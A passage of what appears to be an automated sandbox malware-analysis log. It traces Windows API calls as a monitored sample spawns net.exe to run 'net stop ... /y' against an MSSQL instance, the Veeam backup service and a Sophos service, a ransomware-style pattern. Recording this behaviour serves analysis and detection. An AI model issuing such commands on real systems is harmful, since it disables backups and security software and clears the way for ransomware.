Size=0x78) returned 0x3df790 [0217.010] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0217.010] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x36fcd4 | out: Buffer=0x36fcd4*=0x3e1c80) returned 0x0 [0217.010] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x36fcd4 | out: Buffer=0x36fcd4*=0x3e1c98) returned 0x0 [0217.010] _fileno (_File=0x74eb2900) returned -2 [0217.010] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0217.010] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0217.010] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0217.010] _wcsicmp (_String1="config", _String2="stop") returned -16 [0217.010] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0217.010] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0217.010] _wcsicmp (_String1="file", _String2="stop") returned -13 [0217.010] _wcsicmp (_String1="files", _String2="stop") returned -13 [0217.010] _wcsicmp (_String1="group", _String2="stop") returned -12 [0217.010] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0217.010] _wcsicmp (_String1="help", _String2="stop") returned -11 [0217.010] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0217.010] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0217.010] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0217.010] _wcsicmp (_String1="session", _String2="stop") returned -15 [0217.010] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0217.010] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0217.010] _wcsicmp (_String1="share", _String2="stop") returned -12 [0217.010] _wcsicmp (_String1="start", _String2="stop") returned -14 [0217.011] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0217.011] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0217.011] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0217.011] _wcsicmp (_String1="accounts", _String2="MSSQL$PRACTTICEBGC") returned -12 [0217.011] _wcsicmp (_String1="computer", _String2="MSSQL$PRACTTICEBGC") returned -10 [0217.011] _wcsicmp (_String1="config", _String2="MSSQL$PRACTTICEBGC") returned -10 [0217.011] _wcsicmp (_String1="continue", _String2="MSSQL$PRACTTICEBGC") returned -10 [0217.011] _wcsicmp (_String1="cont", _String2="MSSQL$PRACTTICEBGC") returned -10 [0217.011] _wcsicmp (_String1="file", _String2="MSSQL$PRACTTICEBGC") returned -7 [0217.011] _wcsicmp (_String1="files", _String2="MSSQL$PRACTTICEBGC") returned -7 [0217.011] _wcsicmp (_String1="group", _String2="MSSQL$PRACTTICEBGC") returned -6 [0217.011] _wcsicmp (_String1="groups", _String2="MSSQL$PRACTTICEBGC") returned -6 [0217.011] _wcsicmp (_String1="help", _String2="MSSQL$PRACTTICEBGC") returned -5 [0217.011] _wcsicmp (_String1="helpmsg", _String2="MSSQL$PRACTTICEBGC") returned -5 [0217.011] _wcsicmp (_String1="localgroup", _String2="MSSQL$PRACTTICEBGC") returned -1 [0217.011] _wcsicmp (_String1="pause", _String2="MSSQL$PRACTTICEBGC") returned 3 [0217.011] _wcsicmp (_String1="session", _String2="MSSQL$PRACTTICEBGC") returned 6 [0217.011] _wcsicmp (_String1="sessions", _String2="MSSQL$PRACTTICEBGC") returned 6 [0217.011] _wcsicmp (_String1="sess", _String2="MSSQL$PRACTTICEBGC") returned 6 [0217.011] _wcsicmp (_String1="share", _String2="MSSQL$PRACTTICEBGC") returned 6 [0217.011] _wcsicmp (_String1="start", _String2="MSSQL$PRACTTICEBGC") returned 6 [0217.011] _wcsicmp (_String1="stats", _String2="MSSQL$PRACTTICEBGC") returned 6 [0217.011] _wcsicmp (_String1="statistics", _String2="MSSQL$PRACTTICEBGC") returned 6 [0217.011] _wcsicmp (_String1="stop", _String2="MSSQL$PRACTTICEBGC") returned 6 [0217.011] _wcsicmp (_String1="time", _String2="MSSQL$PRACTTICEBGC") returned 7 [0217.011] _wcsicmp (_String1="user", _String2="MSSQL$PRACTTICEBGC") returned 8 [0217.011] _wcsicmp (_String1="users", _String2="MSSQL$PRACTTICEBGC") returned 8 [0217.011] _wcsicmp (_String1="msg", _String2="MSSQL$PRACTTICEBGC") returned -12 [0217.011] _wcsicmp (_String1="messenger", _String2="MSSQL$PRACTTICEBGC") returned -14 [0217.011] _wcsicmp (_String1="receiver", _String2="MSSQL$PRACTTICEBGC") returned 5 [0217.011] _wcsicmp (_String1="rcv", _String2="MSSQL$PRACTTICEBGC") returned 5 [0217.011] _wcsicmp (_String1="netpopup", _String2="MSSQL$PRACTTICEBGC") returned 1 [0217.011] _wcsicmp (_String1="redirector", _String2="MSSQL$PRACTTICEBGC") returned 5 [0217.011] _wcsicmp (_String1="redir", _String2="MSSQL$PRACTTICEBGC") returned 5 [0217.011] _wcsicmp (_String1="rdr", _String2="MSSQL$PRACTTICEBGC") returned 5 [0217.011] _wcsicmp (_String1="workstation", _String2="MSSQL$PRACTTICEBGC") returned 10 [0217.012] _wcsicmp (_String1="work", _String2="MSSQL$PRACTTICEBGC") returned 10 [0217.012] _wcsicmp (_String1="wksta", _String2="MSSQL$PRACTTICEBGC") returned 10 [0217.012] _wcsicmp (_String1="prdr", _String2="MSSQL$PRACTTICEBGC") returned 3 [0217.012] _wcsicmp (_String1="devrdr", _String2="MSSQL$PRACTTICEBGC") returned -9 [0217.012] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$PRACTTICEBGC") returned -1 [0217.012] _wcsicmp (_String1="server", _String2="MSSQL$PRACTTICEBGC") returned 6 [0217.012] _wcsicmp (_String1="svr", _String2="MSSQL$PRACTTICEBGC") returned 6 [0217.012] _wcsicmp (_String1="srv", _String2="MSSQL$PRACTTICEBGC") returned 6 [0217.012] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$PRACTTICEBGC") returned -1 [0217.012] _wcsicmp (_String1="alerter", _String2="MSSQL$PRACTTICEBGC") returned -12 [0217.012] _wcsicmp (_String1="netlogon", _String2="MSSQL$PRACTTICEBGC") returned 1 [0217.012] _wcsupr (in: _String="MSSQL$PRACTTICEBGC" | out: _String="MSSQL$PRACTTICEBGC") returned="MSSQL$PRACTTICEBGC" [0217.012] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x3e5468 [0217.015] GetServiceKeyNameW (in: hSCManager=0x3e5468, lpDisplayName="MSSQL$PRACTTICEBGC", lpServiceName=0xf9aaf0, lpcchBuffer=0x36fc70 | out: lpServiceName="", lpcchBuffer=0x36fc70) returned 0 [0217.015] _wcsicmp (_String1="msg", _String2="MSSQL$PRACTTICEBGC") returned -12 [0217.015] _wcsicmp (_String1="messenger", _String2="MSSQL$PRACTTICEBGC") returned -14 [0217.015] _wcsicmp (_String1="receiver", _String2="MSSQL$PRACTTICEBGC") returned 5 [0217.015] _wcsicmp (_String1="rcv", _String2="MSSQL$PRACTTICEBGC") returned 5 [0217.015] _wcsicmp (_String1="redirector", _String2="MSSQL$PRACTTICEBGC") returned 5 [0217.015] _wcsicmp (_String1="redir", _String2="MSSQL$PRACTTICEBGC") returned 5 [0217.015] _wcsicmp (_String1="rdr", _String2="MSSQL$PRACTTICEBGC") returned 5 [0217.015] _wcsicmp (_String1="workstation", _String2="MSSQL$PRACTTICEBGC") returned 10 [0217.015] _wcsicmp (_String1="work", _String2="MSSQL$PRACTTICEBGC") returned 10 [0217.015] _wcsicmp (_String1="wksta", _String2="MSSQL$PRACTTICEBGC") returned 10 [0217.015] _wcsicmp (_String1="prdr", _String2="MSSQL$PRACTTICEBGC") returned 3 [0217.015] _wcsicmp (_String1="devrdr", _String2="MSSQL$PRACTTICEBGC") returned -9 [0217.016] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$PRACTTICEBGC") returned -1 [0217.016] _wcsicmp (_String1="server", _String2="MSSQL$PRACTTICEBGC") returned 6 [0217.016] _wcsicmp (_String1="svr", _String2="MSSQL$PRACTTICEBGC") returned 6 [0217.016] _wcsicmp (_String1="srv", _String2="MSSQL$PRACTTICEBGC") returned 6 [0217.016] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$PRACTTICEBGC") returned -1 [0217.016] _wcsicmp (_String1="alerter", _String2="MSSQL$PRACTTICEBGC") returned -12 [0217.016] _wcsicmp (_String1="netlogon", _String2="MSSQL$PRACTTICEBGC") returned 1 [0217.016] NetServiceControl (in: servername=0x0, service="MSSQL$PRACTTICEBGC", opcode=0x0, arg=0x0, bufptr=0x36fc6c | out: bufptr=0x36fc6c) returned 0x889 [0217.017] wcscpy_s (in: _Destination=0xf9a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0217.017] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a80000 [0217.017] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a80000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xf9b338, nSize=0x800, Arguments=0xf99dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0217.018] GetFileType (hFile=0x26c) returned 0x3 [0217.018] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x3e3f98 [0217.018] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x3e3f98, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0217.018] WriteFile (in: hFile=0x26c, lpBuffer=0x3e3f98, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x36fbac, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x36fbac, lpOverlapped=0x0) returned 0 [0217.019] LocalFree (hMem=0x3e3f98) returned 0x0 [0217.019] GetFileType (hFile=0x26c) returned 0x3 [0217.019] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3e6240 [0217.019] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x3e6240, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n>", lpUsedDefaultChar=0x0) returned 2 [0217.019] WriteFile (in: hFile=0x26c, lpBuffer=0x3e6240, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x36fbac, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x36fbac, lpOverlapped=0x0) returned 0 [0217.019] LocalFree (hMem=0x3e6240) returned 0x0 [0217.019] _ultow (in: _Dest=0x889, _Radix=3603420 | out: _Dest=0x889) returned="2185" [0217.019] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a80000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xf9b338, nSize=0x800, Arguments=0xf99dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0217.019] GetFileType (hFile=0x26c) returned 0x3 [0217.019] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x3e6240 [0217.019] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x3e6240, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0217.019] WriteFile (in: hFile=0x26c, lpBuffer=0x3e6240, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x36fbb8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x36fbb8, lpOverlapped=0x0) returned 0 [0217.019] LocalFree (hMem=0x3e6240) returned 0x0 [0217.019] GetFileType (hFile=0x26c) returned 0x3 [0217.019] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3e6240 [0217.019] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x3e6240, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n>", lpUsedDefaultChar=0x0) returned 2 [0217.019] WriteFile (in: hFile=0x26c, lpBuffer=0x3e6240, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x36fbb8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x36fbb8, lpOverlapped=0x0) returned 0 [0217.019] LocalFree (hMem=0x3e6240) returned 0x0 [0217.020] NetApiBufferFree (Buffer=0x3e1c80) returned 0x0 [0217.020] NetApiBufferFree (Buffer=0x3e1c98) returned 0x0 [0217.020] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$PRACTTICEBGC /y" [0217.020] exit (_Code=2) Process: id = "362" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x4ce4d000" os_pid = "0x5a8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop VeeamRESTSvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 537 os_tid = 0x2b0 Process: id = "363" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x5c1d6000" os_pid = "0x87c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "362" os_parent_pid = "0x5a8" cmd_line = "C:\\Windows\\system32\\net1 stop VeeamRESTSvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 538 os_tid = 0x878 [0217.182] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x19fddc | out: lpSystemTimeAsFileTime=0x19fddc*(dwLowDateTime=0x4aa34f80, dwHighDateTime=0x1d57a87)) [0217.182] GetCurrentProcessId () returned 0x87c [0217.182] GetCurrentThreadId () returned 0x878 [0217.182] GetTickCount () returned 0x116fd72 [0217.182] QueryPerformanceCounter (in: lpPerformanceCount=0x19fdd4 | out: lpPerformanceCount=0x19fdd4*=33746667112) returned 1 [0217.182] GetModuleHandleA (lpModuleName=0x0) returned 0xc80000 [0217.182] __set_app_type (_Type=0x1) [0217.182] __p__fmode () returned 0x74eb31f4 [0217.182] __p__commode () returned 0x74eb31fc [0217.183] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xc8ffe6) returned 0x0 [0217.183] __getmainargs (in: _Argc=0xc99064, _Argv=0xc9906c, _Env=0xc99068, _DoWildCard=0, _StartInfo=0xc99024 | out: _Argc=0xc99064, _Argv=0xc9906c, _Env=0xc99068) returned 0 [0217.183] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0217.183] GetConsoleOutputCP () returned 0x1b5 [0217.183] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xc99080 | out: lpCPInfo=0xc99080) returned 1 [0217.183] SetThreadUILanguage (LangId=0x0) returned 0x409 [0217.186] sprintf_s (in: _DstBuf=0x19fd94, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0217.186] setlocale (category=0, locale=".437") returned="English_United States.437" [0217.188] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0217.188] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0217.188] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop VeeamRESTSvc /y" [0217.188] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x19fb60, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0217.189] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x6c) returned 0x4e3c10 [0217.189] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0217.189] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x19fd64 | out: Buffer=0x19fd64*=0x4e1c70) returned 0x0 [0217.189] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x19fd64 | out: Buffer=0x19fd64*=0x4e1c88) returned 0x0 [0217.189] _fileno (_File=0x74eb2900) returned -2 [0217.189] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0217.189] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0217.189] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0217.189] _wcsicmp (_String1="config", _String2="stop") returned -16 [0217.189] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0217.189] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0217.189] _wcsicmp (_String1="file", _String2="stop") returned -13 [0217.189] _wcsicmp (_String1="files", _String2="stop") returned -13 [0217.189] _wcsicmp (_String1="group", _String2="stop") returned -12 [0217.189] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0217.189] _wcsicmp (_String1="help", _String2="stop") returned -11 [0217.189] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0217.189] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0217.189] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0217.189] _wcsicmp (_String1="session", _String2="stop") returned -15 [0217.190] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0217.190] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0217.190] _wcsicmp (_String1="share", _String2="stop") returned -12 [0217.190] _wcsicmp (_String1="start", _String2="stop") returned -14 [0217.190] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0217.190] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0217.190] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0217.190] _wcsicmp (_String1="accounts", _String2="VeeamRESTSvc") returned -21 [0217.190] _wcsicmp (_String1="computer", _String2="VeeamRESTSvc") returned -19 [0217.190] _wcsicmp (_String1="config", _String2="VeeamRESTSvc") returned -19 [0217.190] _wcsicmp (_String1="continue", _String2="VeeamRESTSvc") returned -19 [0217.190] _wcsicmp (_String1="cont", _String2="VeeamRESTSvc") returned -19 [0217.190] _wcsicmp (_String1="file", _String2="VeeamRESTSvc") returned -16 [0217.190] _wcsicmp (_String1="files", _String2="VeeamRESTSvc") returned -16 [0217.190] _wcsicmp (_String1="group", _String2="VeeamRESTSvc") returned -15 [0217.190] _wcsicmp (_String1="groups", _String2="VeeamRESTSvc") returned -15 [0217.190] _wcsicmp (_String1="help", _String2="VeeamRESTSvc") returned -14 [0217.190] _wcsicmp (_String1="helpmsg", _String2="VeeamRESTSvc") returned -14 [0217.190] _wcsicmp (_String1="localgroup", _String2="VeeamRESTSvc") returned -10 [0217.190] _wcsicmp (_String1="pause", _String2="VeeamRESTSvc") returned -6 [0217.190] _wcsicmp (_String1="session", _String2="VeeamRESTSvc") returned -3 [0217.190] _wcsicmp (_String1="sessions", _String2="VeeamRESTSvc") returned -3 [0217.190] _wcsicmp (_String1="sess", _String2="VeeamRESTSvc") returned -3 [0217.190] _wcsicmp (_String1="share", _String2="VeeamRESTSvc") returned -3 [0217.190] _wcsicmp (_String1="start", _String2="VeeamRESTSvc") returned -3 [0217.190] _wcsicmp (_String1="stats", _String2="VeeamRESTSvc") returned -3 [0217.190] _wcsicmp (_String1="statistics", _String2="VeeamRESTSvc") returned -3 [0217.190] _wcsicmp (_String1="stop", _String2="VeeamRESTSvc") returned -3 [0217.190] _wcsicmp (_String1="time", _String2="VeeamRESTSvc") returned -2 [0217.190] _wcsicmp (_String1="user", _String2="VeeamRESTSvc") returned -1 [0217.190] _wcsicmp (_String1="users", _String2="VeeamRESTSvc") returned -1 [0217.190] _wcsicmp (_String1="msg", _String2="VeeamRESTSvc") returned -9 [0217.190] _wcsicmp (_String1="messenger", _String2="VeeamRESTSvc") returned -9 [0217.190] _wcsicmp (_String1="receiver", _String2="VeeamRESTSvc") returned -4 [0217.190] _wcsicmp (_String1="rcv", _String2="VeeamRESTSvc") returned -4 [0217.190] _wcsicmp (_String1="netpopup", _String2="VeeamRESTSvc") returned -8 [0217.190] _wcsicmp (_String1="redirector", _String2="VeeamRESTSvc") returned -4 [0217.191] _wcsicmp (_String1="redir", _String2="VeeamRESTSvc") returned -4 [0217.191] _wcsicmp (_String1="rdr", _String2="VeeamRESTSvc") returned -4 [0217.191] _wcsicmp (_String1="workstation", _String2="VeeamRESTSvc") returned 1 [0217.191] _wcsicmp (_String1="work", _String2="VeeamRESTSvc") returned 1 [0217.191] _wcsicmp (_String1="wksta", _String2="VeeamRESTSvc") returned 1 [0217.191] _wcsicmp (_String1="prdr", _String2="VeeamRESTSvc") returned -6 [0217.191] _wcsicmp (_String1="devrdr", _String2="VeeamRESTSvc") returned -18 [0217.191] _wcsicmp (_String1="lanmanworkstation", _String2="VeeamRESTSvc") returned -10 [0217.191] _wcsicmp (_String1="server", _String2="VeeamRESTSvc") returned -3 [0217.191] _wcsicmp (_String1="svr", _String2="VeeamRESTSvc") returned -3 [0217.191] _wcsicmp (_String1="srv", _String2="VeeamRESTSvc") returned -3 [0217.191] _wcsicmp (_String1="lanmanserver", _String2="VeeamRESTSvc") returned -10 [0217.191] _wcsicmp (_String1="alerter", _String2="VeeamRESTSvc") returned -21 [0217.191] _wcsicmp (_String1="netlogon", _String2="VeeamRESTSvc") returned -8 [0217.191] _wcsupr (in: _String="VeeamRESTSvc" | out: _String="VEEAMRESTSVC") returned="VEEAMRESTSVC" [0217.191] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x4e54d0 [0217.194] GetServiceKeyNameW (in: hSCManager=0x4e54d0, lpDisplayName="VEEAMRESTSVC", lpServiceName=0xc9aaf0, lpcchBuffer=0x19fd00 | out: lpServiceName="", lpcchBuffer=0x19fd00) returned 0 [0217.194] _wcsicmp (_String1="msg", _String2="VEEAMRESTSVC") returned -9 [0217.194] _wcsicmp (_String1="messenger", _String2="VEEAMRESTSVC") returned -9 [0217.194] _wcsicmp (_String1="receiver", _String2="VEEAMRESTSVC") returned -4 [0217.194] _wcsicmp (_String1="rcv", _String2="VEEAMRESTSVC") returned -4 [0217.194] _wcsicmp (_String1="redirector", _String2="VEEAMRESTSVC") returned -4 [0217.194] _wcsicmp (_String1="redir", _String2="VEEAMRESTSVC") returned -4 [0217.194] _wcsicmp (_String1="rdr", _String2="VEEAMRESTSVC") returned -4 [0217.194] _wcsicmp (_String1="workstation", _String2="VEEAMRESTSVC") returned 1 [0217.194] _wcsicmp (_String1="work", _String2="VEEAMRESTSVC") returned 1 [0217.194] _wcsicmp (_String1="wksta", _String2="VEEAMRESTSVC") returned 1 [0217.194] _wcsicmp (_String1="prdr", _String2="VEEAMRESTSVC") returned -6 [0217.194] _wcsicmp (_String1="devrdr", _String2="VEEAMRESTSVC") returned -18 [0217.194] _wcsicmp (_String1="lanmanworkstation", _String2="VEEAMRESTSVC") returned -10 [0217.194] _wcsicmp (_String1="server", _String2="VEEAMRESTSVC") returned -3 [0217.194] _wcsicmp (_String1="svr", _String2="VEEAMRESTSVC") returned -3 [0217.194] _wcsicmp (_String1="srv", _String2="VEEAMRESTSVC") returned -3 [0217.194] _wcsicmp (_String1="lanmanserver", _String2="VEEAMRESTSVC") returned -10 [0217.195] _wcsicmp (_String1="alerter", _String2="VEEAMRESTSVC") returned -21 [0217.195] _wcsicmp (_String1="netlogon", _String2="VEEAMRESTSVC") returned -8 [0217.195] NetServiceControl (in: servername=0x0, service="VEEAMRESTSVC", opcode=0x0, arg=0x0, bufptr=0x19fcfc | out: bufptr=0x19fcfc) returned 0x889 [0217.195] wcscpy_s (in: _Destination=0xc9a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0217.195] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a10000 [0217.196] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a10000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xc9b338, nSize=0x800, Arguments=0xc99dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0217.197] GetFileType (hFile=0x26c) returned 0x3 [0217.197] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x4e4000 [0217.197] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x4e4000, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0217.197] WriteFile (in: hFile=0x26c, lpBuffer=0x4e4000, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x19fc3c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x19fc3c, lpOverlapped=0x0) returned 0 [0217.197] LocalFree (hMem=0x4e4000) returned 0x0 [0217.197] GetFileType (hFile=0x26c) returned 0x3 [0217.197] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x4e62a8 [0217.197] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x4e62a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nN", lpUsedDefaultChar=0x0) returned 2 [0217.198] WriteFile (in: hFile=0x26c, lpBuffer=0x4e62a8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x19fc3c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x19fc3c, lpOverlapped=0x0) returned 0 [0217.198] LocalFree (hMem=0x4e62a8) returned 0x0 [0217.198] _ultow (in: _Dest=0x889, _Radix=1703020 | out: _Dest=0x889) returned="2185" [0217.198] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a10000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xc9b338, nSize=0x800, Arguments=0xc99dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0217.198] GetFileType (hFile=0x26c) returned 0x3 [0217.198] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x4e62a8 [0217.198] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x4e62a8, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0217.198] WriteFile (in: hFile=0x26c, lpBuffer=0x4e62a8, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x19fc48, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x19fc48, lpOverlapped=0x0) returned 0 [0217.198] LocalFree (hMem=0x4e62a8) returned 0x0 [0217.198] GetFileType (hFile=0x26c) returned 0x3 [0217.198] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x4e62a8 [0217.198] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x4e62a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nN", lpUsedDefaultChar=0x0) returned 2 [0217.198] WriteFile (in: hFile=0x26c, lpBuffer=0x4e62a8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x19fc48, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x19fc48, lpOverlapped=0x0) returned 0 [0217.198] LocalFree (hMem=0x4e62a8) returned 0x0 [0217.199] NetApiBufferFree (Buffer=0x4e1c70) returned 0x0 [0217.199] NetApiBufferFree (Buffer=0x4e1c88) returned 0x0 [0217.199] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop VeeamRESTSvc /y" [0217.199] exit (_Code=2) Process: id = "364" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x5f852000" os_pid = "0xb5c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop sophossps /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], 